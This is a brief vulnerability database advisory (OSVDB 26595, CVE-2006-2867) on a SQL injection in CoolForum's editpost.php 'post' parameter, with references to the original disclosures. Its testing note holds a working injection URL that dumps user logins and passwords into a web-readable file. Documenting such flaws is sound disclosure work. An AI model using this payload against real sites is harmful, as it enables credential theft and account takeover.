CoolForum editpost.php post Variable SQL Injection

2006-06-03T02:56:55
ID OSVDB:26595
Type osvdb
Reporter OSVDB
Modified 2006-06-03T02:56:55

Description

Manual Testing Notes

http://[target]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

References:

Other Advisory URL: http://mgsdl.free.fr/advisories/coolforum083ba.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0749.html
CVE-2006-2867
Bugtraq ID: 18268